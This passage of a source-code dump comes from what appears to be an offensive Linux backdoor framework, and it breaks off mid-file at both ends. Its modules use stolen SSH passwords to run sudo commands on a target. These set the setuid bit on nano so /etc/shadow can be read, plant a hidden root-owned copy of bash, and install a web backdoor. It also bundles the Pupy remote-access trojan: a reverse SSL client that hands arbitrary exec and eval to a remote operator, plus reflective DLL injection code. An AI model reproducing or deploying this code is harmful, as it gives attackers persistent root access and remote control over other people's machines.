do_exploit(self, args): 23 | target = self.core.curtarget 24 | print("Creating web server....") 25 | target.scpFiles(self, "backdoors/auxiliary/__web/install.sh", False) 26 | target.ssh.exec_command("echo " + target.pword + " | sudo -S bash ~/install.sh") 27 | for mod in self.modules.keys(): 28 | print(INFO + "Attempting to execute " + mod.name + " module...") 29 | mod.exploit(self.get_command()) 30 | 31 | -------------------------------------------------------------------------------- /backdoors/connection.py: -------------------------------------------------------------------------------- 1 | import threading 2 | import pexpect 3 | 4 | class Connection: 5 | def __init__(self, intro, conn, numb): 6 | self.open = False 7 | self.type = intro 8 | self.connection = conn 9 | self.listening = 1 10 | self.number = int(numb) + 1 11 | self.thread = threading.Thread(target=self.wait) 12 | self.thread.start() 13 | def __str__(self): 14 | string = "" 15 | if(self.open): 16 | string += "Open\n" 17 | else: 18 | string += "Closed\n" 19 | string += self.type 20 | #string += self.connection + "\n" 21 | return string 22 | 23 | def wait(self): 24 | try: 25 | self.connection.expect("Connection Received.") 26 | print("\nSession " + str(self.number) + " has recieved a connection. Type sessions -i " + str(self.number) + " to interact.") 27 | self.open = True 28 | except: 29 | self.open = False 30 | 31 | def interact(self): 32 | if self.connection.isalive(): 33 | if self.listening == 0: 34 | self.connection.sendline() 35 | print("Press Control + ] to exit the shell."), 36 | 37 | else: 38 | self.listening = 0 39 | print("Press Control + ] to exit the shell."), 40 | self.connection.interact(escape_character='\x1d', input_filter=None, output_filter=None) 41 | else: 42 | print("The connection has been lost") -------------------------------------------------------------------------------- /backdoors/escalation/setuid.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | 3 | 4 | class Setuid(Backdoor): 5 | prompt = Fore.RED + "(setuid) " + Fore.BLUE + ">> " + Fore.RESET 6 | 7 | def __init__(self, core): 8 | cmd.Cmd.__init__(self) 9 | self.intro = GOOD + "Using setuid priviledge escalation backdoor..." 10 | self.core = core 11 | self.options = { 12 | "program" : Option("program", "/bin/nano", "binary on which to set the setuid bit", True), 13 | } 14 | self.allow_modules = True 15 | self.modules = {} 16 | self.help_text = INFO + "The SetUID backdoor works by setting the setuid bit on a binary while the user has root acccess, so that when that binary is later run by a user without root access, the binary is executed with root access.\n" + INFO +"By default, this backdoor flips the setuid bit on nano, so that if root access is ever lost, the attacker can SSH back in as an unpriviledged user and still be able to run nano (or any binary) as root. ('nano /etc/shadow')." 17 | 18 | def get_command(self): 19 | return "echo " + self.core.curtarget.pword + " | sudo -S chmod u+s %s" % (self.get_value("program")) 20 | 21 | def do_exploit(self, args): 22 | port = self.get_value("port") 23 | target = self.core.curtarget 24 | print(GOOD + "Initializing backdoor...") 25 | target.ssh.exec_command(self.get_command()) 26 | print(GOOD + "Priviledge escalation backdoor created.") 27 | for mod in self.modules.keys(): 28 | print(INFO + "Attempting to execute " + mod.name + " module...") 29 | mod.exploit() 30 | -------------------------------------------------------------------------------- /backdoors/escalation/shell.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | 3 | class Shell(Backdoor): 4 | prompt = Fore.RED + "(shell) " + Fore.BLUE + ">> " + Fore.RESET 5 | 6 | def __init__(self, core): 7 | cmd.Cmd.__init__(self) 8 | self.intro = GOOD + "Using Shell backdoor..." 9 | self.core = core 10 | self.options = { 11 | "name" : Option("name", "/bin/.bash", "name of the duplicated shell", True), 12 | } 13 | 14 | self.modules = {} 15 | self.allow_modules = True 16 | self.help_text = GOOD + "The shell backdoor is a priviledge escalation backdoor, similar to (but more powerful than) it's SetUID escalation brother. It duplicates the bash shell to a hidden binary, and sets the SUID bit. Unlike the SetUID backdoor though, this shell gives an unpriviledged user root priviledge with a full shell. Note that you need root access to initially deploy. To use, while SSHed in as an unpriviledged user, simply run \".bash -p\", and you will have root access." 17 | 18 | def get_command(self): 19 | return "echo " + self.core.curtarget.pword + " | sudo -S cp /bin/bash " + self.get_value("name") + " && echo " + self.core.curtarget.pword + " | sudo -S chmod 4755 " + self.get_value("name") 20 | 21 | def do_exploit(self, args): 22 | target = self.core.curtarget 23 | print(GOOD + "Initializing backdoor...") 24 | target.ssh.exec_command(self.get_command()) 25 | print(GOOD + "Shell Backdoor attempted.") 26 | for mod in self.modules.keys(): 27 | print(INFO + "Attempting to execute " + mod.name + " module...") 28 | mod.exploit() 29 | 30 | -------------------------------------------------------------------------------- /backdoors/option.py: -------------------------------------------------------------------------------- 1 | class Option(object): 2 | 3 | def __init__(self, name, value, description, required): 4 | self.name = name 5 | self.value = value 6 | self.description = description 7 | self.required = required 8 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/.gitignore: -------------------------------------------------------------------------------- 1 | #pupy stuff 2 | pupy/data/ 3 | pupy/.pupy_history 4 | .DS_Store 5 | *.swp 6 | 7 | 8 | #do not redistribute microsoft visual C++ DLLs (LICENSE) 9 | client/sources/resources/msvcr90.dll 10 | client/sources/resources/msvcr90_x86.dll 11 | client/sources/resources/msvcr90_x64.dll 12 | 13 | #Client build related stuff 14 | *.obj 15 | *.lib 16 | *.exp 17 | *.exe 18 | *.dll 19 | client/sources/resources_bootloader_pyc.c 20 | client/sources/resources_bootloader.pyc 21 | client/sources/resources_python27_dll.c 22 | client/sources/resources/library_compressed_string.txt 23 | client/sources/resources/python27.dll 24 | client/sources/resources_library_compressed_string_txt.c 25 | client/sources/resources/library_compressed_string_x86.txt 26 | client/sources/resources/library_compressed_string_x64.txt 27 | client/sources/resources_msvcr90_dll.c 28 | 29 | # Byte-compiled / optimized / DLL files 30 | __pycache__/ 31 | client/**/*.py[cod] 32 | pupy/*.py[cod] 33 | pupy/pupylib/**/*.py[cod] 34 | pupy/modules/*.py[cod] 35 | 36 | # do not ignore package & templates files 37 | !pupy/packages/ 38 | !pupy/payload_templates/ 39 | 40 | # C extensions 41 | *.so 42 | 43 | # Distribution / packaging 44 | .Python 45 | env/ 46 | build/ 47 | develop-eggs/ 48 | dist/ 49 | downloads/ 50 | eggs/ 51 | .eggs/ 52 | lib/ 53 | lib64/ 54 | parts/ 55 | sdist/ 56 | var/ 57 | *.egg-info/ 58 | .installed.cfg 59 | *.egg 60 | 61 | # PyInstaller 62 | # Usually these files are written by a python script from a template 63 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 64 | *.manifest 65 | *.spec 66 | 67 | # Installer logs 68 | pip-log.txt 69 | pip-delete-this-directory.txt 70 | 71 | # Unit test / coverage reports 72 | htmlcov/ 73 | .tox/ 74 | .coverage 75 | .coverage.* 76 | .cache 77 | nosetests.xml 78 | coverage.xml 79 | *,cover 80 | 81 | # Translations 82 | *.mo 83 | *.pot 84 | 85 | # Django stuff: 86 | *.log 87 | 88 | # Sphinx documentation 89 | docs/_build/ 90 | 91 | # PyBuilder 92 | target/ 93 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu) 2 | All rights reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 5 | 6 | 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 7 | 8 | 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 9 | 10 | 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. 11 | 12 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE 13 | 14 | Pupy also uses some code source/libraries from other projects under different licenses. Among these project, you may find : 15 | -For the client part: 16 | cf the file client/sources/LICENSES.txt 17 | -For the packages located in pupy/packages/: 18 | -VideoCapture by Markus Gritsch (m.gritsch@gmail.com) under the LGPL license. 19 | http://videocapture.sourceforge.net/ 20 | -psutil by Giampaolo Rodola under the BSD license 21 | https://github.com/giampaolo/psutil 22 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/additional_imports.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import threading 3 | import Queue 4 | import collections 5 | import SocketServer 6 | import struct 7 | import os 8 | import sys 9 | import time 10 | import traceback 11 | import uuid 12 | import subprocess 13 | import StringIO 14 | import imp 15 | import hashlib 16 | import base64 17 | import logging 18 | import re 19 | import ssl 20 | import tempfile 21 | import string 22 | import datetime 23 | import random 24 | import shutil 25 | import platform 26 | import errno, stat 27 | import zlib 28 | import tempfile 29 | import code 30 | import Queue 31 | import glob 32 | import multiprocessing 33 | import math 34 | import binascii 35 | import inspect 36 | import shlex 37 | import json 38 | import ctypes 39 | import ctypes.wintypes 40 | import threading 41 | import time 42 | import urllib 43 | import urllib2 44 | import socks 45 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/build_library_helper.py: -------------------------------------------------------------------------------- 1 | import sys 2 | from distutils.core import setup 3 | import py2exe 4 | import os 5 | from glob import glob 6 | import zipfile 7 | import shutil 8 | 9 | """ 10 | This setup is not meant to build pupy stubs, but only to generate an adequate library.zip to embed in the real exe/dll stub 11 | please don't use this if you don't want to recompile from sources 12 | 13 | NOTE: I had to manually change pyreadline/console/console.py to console2.py and edit __init__.py to change the import because I had a conflict 14 | 15 | """ 16 | if not (len(sys.argv)==3 and sys.argv[1]=="genzip"): 17 | exit("This setup is not meant to build pupy stubs, but only to generate an adequate library.zip to embed in the real exe/dll stub\nplease don't use this if you don't want to recompile from sources") 18 | if sys.argv[2] == 'x86': 19 | outname = 'x86' 20 | platform = 'x86' 21 | elif sys.argv[2] == 'x64': 22 | outname = 'x64' 23 | platform = 'amd64' 24 | else: 25 | exit('unsupported platform') 26 | sys.argv=[sys.argv[0],"py2exe"] 27 | 28 | 29 | # put necessary library patches/includes/whatever in this directory 30 | sys.path.insert(0, "sources/resources/library_patches") 31 | 32 | 33 | setup( 34 | data_files = [(".", glob(r'.\RESOURCES_x86\msvcr90.dll'))], 35 | console=['reverse_ssl.py'], 36 | #windows=['reverse_ssl.py'], 37 | #zipfile=None, 38 | options={ "py2exe" : { 39 | "packages":['additional_imports'], 40 | "compressed" : True, 41 | "bundle_files" : 3, #3 = don't bundle (default) 2 = bundle everything but the Python interpreter 1 = bundle everything 42 | "excludes": ["Tkinter"] 43 | } 44 | } 45 | ) 46 | 47 | excluded_files = [ 48 | 'crypt32.dll', 49 | 'library.zip', 50 | 'mswsock.dll', 51 | 'python27.dll', 52 | ] 53 | def zwalk(path, zf): 54 | for root, dirs, files in os.walk(path): 55 | for file in files: 56 | if file.lower() in excluded_files: 57 | pass 58 | else: 59 | zf.write(os.path.join(root, file)) 60 | 61 | 62 | with zipfile.ZipFile('sources/resources/library%s.zip' % outname, 'w', zipfile.ZIP_DEFLATED) as zf: 63 | root = os.getcwd() 64 | os.chdir('build/bdist.win-%s/winexe/collect-2.7' % platform) 65 | zwalk('.', zf) 66 | os.chdir('%s/dist' % root) 67 | zwalk('.', zf) 68 | 69 | print 'cleaning up' 70 | os.chdir(root) 71 | shutil.rmtree('build') 72 | shutil.rmtree('dist') 73 | 74 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/reverse_ssl.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: UTF8 -*- 3 | import site 4 | import sys 5 | import time 6 | import rpyc 7 | from rpyc.core.service import Service, ModuleNamespace 8 | from rpyc.lib.compat import execute, is_py3k 9 | import threading 10 | import weakref 11 | import traceback 12 | import os 13 | import subprocess 14 | import threading 15 | import multiprocessing 16 | import logging 17 | import StringIO 18 | import json 19 | import urllib2 20 | import urllib 21 | import platform 22 | import re 23 | import ssl 24 | import random 25 | import imp 26 | 27 | 28 | class ReverseSlaveService(Service): 29 | """ Pupy reverse shell rpyc service """ 30 | __slots__=["exposed_namespace"] 31 | def on_connect(self): 32 | self.exposed_namespace = {} 33 | self._conn._config.update(dict( 34 | allow_all_attrs = True, 35 | allow_public_attrs = True, 36 | allow_pickle = True, 37 | allow_getattr = True, 38 | allow_setattr = True, 39 | allow_delattr = True, 40 | import_custom_exceptions = False, 41 | propagate_SystemExit_locally=True, 42 | propagate_KeyboardInterrupt_locally=True, 43 | instantiate_custom_exceptions = True, 44 | instantiate_oldstyle_exceptions = True, 45 | )) 46 | # shortcuts 47 | self._conn.root.set_modules(ModuleNamespace(self.exposed_getmodule)) 48 | 49 | def on_disconnect(self): 50 | print "disconnecting !" 51 | raise KeyboardInterrupt 52 | 53 | def exposed_exit(self): 54 | raise SystemExit 55 | 56 | def exposed_execute(self, text): 57 | """execute arbitrary code (using ``exec``)""" 58 | execute(text, self.exposed_namespace) 59 | def exposed_eval(self, text): 60 | """evaluate arbitrary code (using ``eval``)""" 61 | return eval(text, self.exposed_namespace) 62 | def exposed_getmodule(self, name): 63 | """imports an arbitrary module""" 64 | return __import__(name, None, None, "*") 65 | def exposed_getconn(self): 66 | """returns the local connection instance to the other side""" 67 | return self._conn 68 | 69 | def get_next_wait(attempt): 70 | if attempt<60: 71 | return 0.5 72 | else: 73 | return random.randint(15,30) 74 | 75 | def add_pseudo_pupy_module(HOST): 76 | """ add a pseudo pupy module for *nix payloads """ 77 | if not "pupy" in sys.modules: 78 | mod = imp.new_module("pupy") 79 | mod.__name__="pupy" 80 | mod.__file__="\\\\pupy" 81 | mod.__package__="pupy" 82 | sys.modules["pupy"]=mod 83 | mod.get_connect_back_host=(lambda : HOST) 84 | mod.pseudo=True 85 | 86 | def main(): 87 | HOST="127.0.0.1:443" 88 | if "windows" in platform.system().lower(): 89 | try: 90 | import pupy 91 | HOST=pupy.get_connect_back_host() 92 | except ImportError: 93 | print "Warning : ImportError: pupy builtin module not found ! please start pupy from either it's exe stub or it's reflective DLL" 94 | else: 95 | if len(sys.argv)!=2: 96 | sys.exit("usage: %s host:port"%sys.argv[0]) 97 | HOST=sys.argv[1] 98 | add_pseudo_pupy_module(HOST) 99 | attempt=0 100 | while True: 101 | try: 102 | rhost,rport=None,None 103 | tab=HOST.rsplit(":",1) 104 | rhost=tab[0] 105 | if len(tab)==2: 106 | rport=int(tab[1]) 107 | else: 108 | rport=443 109 | print "connecting to %s:%s"%(rhost,rport) 110 | conn=rpyc.ssl_connect(rhost, rport, service = ReverseSlaveService) 111 | while True: 112 | attempt=0 113 | conn.serve() 114 | except KeyboardInterrupt: 115 | print "keyboard interrupt raised, restarting the connection" 116 | except SystemExit: 117 | print "SystemExit raised" 118 | break 119 | except Exception as e: 120 | time.sleep(get_next_wait(attempt)) 121 | attempt+=1 122 | 123 | if __name__=="__main__": 124 | main() 125 | 126 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/sources/GetProcAddressR.h: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2013, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H 29 | #define _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H 30 | //===============================================================================================// 31 | #include "ReflectiveDLLInjection.h" 32 | 33 | FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName ); 34 | //===============================================================================================// 35 | #endif 36 | //===============================================================================================// 37 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/sources/LoadLibraryR.h: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2013, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H 29 | #define _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H 30 | //===============================================================================================// 31 | #include "ReflectiveDLLInjection.h" 32 | 33 | DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer ); 34 | 35 | HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength ); 36 | 37 | HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter ); 38 | 39 | //===============================================================================================// 40 | #endif 41 | //===============================================================================================// 42 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/sources/Makefile: -------------------------------------------------------------------------------- 1 | CC=cl.exe 2 | 3 | PYTHONPATH=C:/Python27 4 | PYTHON=$(PYTHONPATH)/python.exe 5 | 6 | TEMPLATE_OUTPUT_PATH=..\..\pupy\payload_templates 7 | 8 | ifndef ARCH 9 | $(error You must specify an architecture.) 10 | else 11 | ifeq "$(ARCH)" "x64" 12 | CFLAGS:=$(CFLAGS) /DWIN_X64 /D_WIN64 13 | endif 14 | endif 15 | 16 | PYOBJS=_memimporter.obj MyLoadLibrary.obj Python-dynload.obj pupy_load.obj pupy.obj base_inject.obj 17 | COMMON_OBJS=resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj resources_library_compressed_string_txt.obj actctx.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj resources_msvcr90_dll.obj 18 | 19 | all: $(TEMPLATE_OUTPUT_PATH)\pupy$(ARCH).exe $(TEMPLATE_OUTPUT_PATH)\pupy$(ARCH).dll 20 | 21 | resources\library_compressed_string_$(ARCH).txt: gen_library_compressed_string.py 22 | $(PYTHON) $+ 23 | 24 | resources\library_compressed_string.txt: resources\library_compressed_string_$(ARCH).txt 25 | copy $< $@ 26 | 27 | resources_library_compressed_string_txt.c: gen_resource_header.py resources\library_compressed_string.txt 28 | $(PYTHON) $+ 29 | 30 | resources\bootloader.pyc: gen_python_bootloader.py 31 | $(PYTHON) $+ 32 | 33 | resources_bootloader_pyc.c: gen_resource_header.py resources\bootloader.pyc 34 | $(PYTHON) $+ 35 | 36 | resources\python27.dll: resources\python27_$(ARCH).dll 37 | copy $< $@ 38 | 39 | resources_python27_dll.c: gen_resource_header.py resources\python27.dll 40 | $(PYTHON) $+ 41 | 42 | resources\msvcr90.dll: resources\msvcr90_$(ARCH).dll 43 | copy $< $@ 44 | 45 | resources_msvcr90_dll.c: gen_resource_header.py resources\msvcr90.dll 46 | $(PYTHON) $+ 47 | 48 | $(PYOBJS): %.obj: %.c 49 | $(CC) /c $(CFLAGS) /I$(PYTHONPATH)/include $< 50 | 51 | %.obj: %.c 52 | $(CC) /c $(CFLAGS) $< 53 | 54 | ReflectiveLoader.obj: ReflectiveLoader.c 55 | $(CC) /c $(CFLAGS) /DREFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN /DREFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR /O2 /Ob1 $< 56 | 57 | $(TEMPLATE_OUTPUT_PATH)\pupy$(ARCH).exe: main_exe.obj $(PYOBJS) $(COMMON_OBJS) 58 | $(CC) $(CFLAGS) $+ /Fe$@ 59 | 60 | $(TEMPLATE_OUTPUT_PATH)\pupy$(ARCH).dll: main_reflective.obj $(PYOBJS) ReflectiveLoader.obj $(COMMON_OBJS) 61 | $(CC) $(CFLAGS) $+ /Fe$@ /LD 62 | 63 | .PHONY: clean 64 | 65 | ifneq "$(QUICK)" "1" 66 | .PHONY: resources\python27.dll resources\msvcr90.dll 67 | endif 68 | 69 | clean: 70 | del *.obj 71 | del *.exp 72 | del pupy$(ARCH).exe 73 | del pupy$(ARCH).dll 74 | del resources\bootloader.pyc 75 | del resources\library_compressed_string.txt 76 | del resources\library_compressed_string_x64.txt 77 | del resources\library_compressed_string_x86.txt 78 | del resources\python27.dll 79 | del resources\msvcr90.dll 80 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/sources/MyLoadLibrary.h: -------------------------------------------------------------------------------- 1 | #ifndef GENERALLOADLIBRARY_H 2 | #define GENERALLOADLIBRARY_H 3 | 4 | HMODULE MyLoadLibrary(LPCSTR, void *, void *); 5 | 6 | HMODULE MyGetModuleHandle(LPCSTR); 7 | 8 | BOOL MyFreeLibrary(HMODULE); 9 | 10 | FARPROC MyGetProcAddress(HMODULE, LPCSTR); 11 | 12 | 13 | #endif 14 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/sources/Python-dynload.c: -------------------------------------------------------------------------------- 1 | /* **************** Python-dynload.c **************** */ 2 | #include "Python-dynload.h" 3 | #include 4 | #include "MyLoadLibrary.h" 5 | #include "MemoryModule.h" 6 | #include "actctx.h" 7 | #include 8 | 9 | struct IMPORT imports[] = { 10 | #include "import-tab.c" 11 | { NULL, NULL }, /* sentinel */ 12 | }; 13 | 14 | void Py_XDECREF(PyObject *ob) 15 | { 16 | static PyObject *tup; 17 | if (tup == NULL) 18 | tup = PyTuple_New(1); 19 | /* Let the tuple take the refcount */ 20 | PyTuple_SetItem(tup, 0, ob); 21 | /* and overwrite it */ 22 | PyTuple_SetItem(tup, 0, PyInt_FromLong(0)); 23 | } 24 | 25 | void Py_XINCREF(PyObject *ob) 26 | { 27 | if (ob) 28 | Py_BuildValue("O", ob); 29 | } 30 | 31 | int _load_python_FromFile(char *dllname) 32 | { 33 | int i; 34 | struct IMPORT *p = imports; 35 | HMODULE hmod; 36 | 37 | // In some cases (eg, ISAPI filters), Python may already be 38 | // in our process. If so, we don't want it to try and 39 | // load a new one! (Actually, we probably should not even attempt 40 | // to load an 'embedded' Python should GetModuleHandle work - but 41 | // that is less clear than this straight-forward case) 42 | // Get the basename of the DLL. 43 | char *dllbase = dllname + strlen(dllname); 44 | while (dllbase != dllname && *dllbase != '\\') 45 | dllbase--; 46 | if (*dllbase=='\\') 47 | ++dllbase; 48 | hmod = GetModuleHandle(dllbase); 49 | if (hmod == NULL) 50 | hmod = LoadLibrary(dllname); 51 | if (hmod == NULL) { 52 | return 0; 53 | } 54 | 55 | for (i = 0; p->name; ++i, ++p) { 56 | p->proc = (void (*)())GetProcAddress(hmod, p->name); 57 | if (p->proc == NULL) { 58 | OutputDebugString("undef symbol"); 59 | fprintf(stderr, "undefined symbol %s -> exit(-1)\n", p->name); 60 | return 0; 61 | } 62 | } 63 | 64 | return 1; 65 | } 66 | 67 | int _load_msvcr90(char *bytes) 68 | { 69 | HMODULE hmod; 70 | ULONG_PTR cookie = 0; 71 | cookie = _My_ActivateActCtx(); 72 | hmod = MyLoadLibrary("msvcr90.dll", bytes, NULL); 73 | if (hmod == NULL) { 74 | return 0; 75 | } 76 | _My_DeactivateActCtx(cookie); 77 | return 1; 78 | 79 | } 80 | int _load_python(char *dllname, char *bytes) 81 | { 82 | int i; 83 | struct IMPORT *p = imports; 84 | HMODULE hmod; 85 | ULONG_PTR cookie = 0; 86 | if (!bytes) 87 | return _load_python_FromFile(dllname); 88 | 89 | 90 | cookie = _My_ActivateActCtx();//try some windows manifest magic... 91 | //hmod = MemoryLoadLibrary(bytes); 92 | hmod = MyLoadLibrary(dllname, bytes, NULL); 93 | _My_DeactivateActCtx(cookie); 94 | if (hmod == NULL) { 95 | return 0; 96 | } 97 | 98 | for (i = 0; p->name; ++i, ++p) { 99 | //p->proc = (void (*)())MemoryGetProcAddress(hmod, p->name); 100 | p->proc = (void (*)())MyGetProcAddress(hmod, p->name); 101 | if (p->proc == NULL) { 102 | OutputDebugString("undef symbol"); 103 | fprintf(stderr, "undefined symbol %s -> exit(-1)\n", p->name); 104 | return 0; 105 | } 106 | } 107 | 108 | return 1; 109 | } 110 | 111 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/sources/Python-dynload.h: -------------------------------------------------------------------------------- 1 | /* **************** Python-dynload.h **************** */ 2 | #include "Python-version.h" 3 | 4 | typedef void *PyObject; 5 | typedef void *PyCodeObject; 6 | 7 | typedef PyObject *(*PyCFunction)(PyObject *, PyObject *); 8 | 9 | typedef 10 | enum {PyGILState_LOCKED, PyGILState_UNLOCKED} 11 | PyGILState_STATE; 12 | typedef struct { 13 | char *ml_name; 14 | PyCFunction ml_meth; 15 | int ml_flags; 16 | char *ml_doc; 17 | } PyMethodDef; 18 | 19 | struct IMPORT { 20 | char *name; 21 | void (*proc)(); 22 | }; 23 | extern int _load_python(char *dllname, char *dllbytes); 24 | extern struct IMPORT imports[]; 25 | 26 | #include "import-tab.h" 27 | 28 | extern void Py_XINCREF(PyObject *); 29 | #define snprintf _snprintf 30 | #define Py_DECREF(x) Py_XDECREF(x) 31 | #define Py_INCREF(x) Py_XINCREF(x) 32 | 33 | extern void Py_XDECREF(PyObject *ob); 34 | 35 | #define METH_OLDARGS 0x0000 36 | #define METH_VARARGS 0x0001 37 | #define METH_KEYWORDS 0x0002 38 | /* METH_NOARGS and METH_O must not be combined with the flags above. */ 39 | #define METH_NOARGS 0x0004 40 | #define METH_O 0x0008 41 | 42 | /* METH_CLASS and METH_STATIC are a little different; these control 43 | the construction of methods for a class. These cannot be used for 44 | functions in modules. */ 45 | #define METH_CLASS 0x0010 46 | #define METH_STATIC 0x0020 47 | 48 | #define PyCFunction_New(ML, SELF) PyCFunction_NewEx((ML), (SELF), NULL) 49 | 50 | #define PyInt_Check(op) PyObject_IsInstance(op, &PyInt_Type) /* ??? */ 51 | #define Py_None (&_Py_NoneStruct) 52 | 53 | #define DL_EXPORT(x) x 54 | 55 | #define Py_InitModule3(name, methods, doc) \ 56 | Py_InitModule4(name, methods, doc, (PyObject *)NULL, \ 57 | PYTHON_API_VERSION) 58 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/client/sources/Python-version.h: -------------------------------------------------------------------------------- 1 | #include 2 | #if (PY_VERSION_HEX < 0x02050000) 3 | # define PYTHON_API_VERSION 1012 4 | typedef int Py_ssize_t; 5 | #else 6 | # define PYTHON_API_VERSION 1013 7 | /* The check for _WIN64 must come first, because on win64 both _WIN64 and 8 | * _WIN32 are defined! 9 | */ 10 | # if defined (_WIN64) 11 | typedef __int64 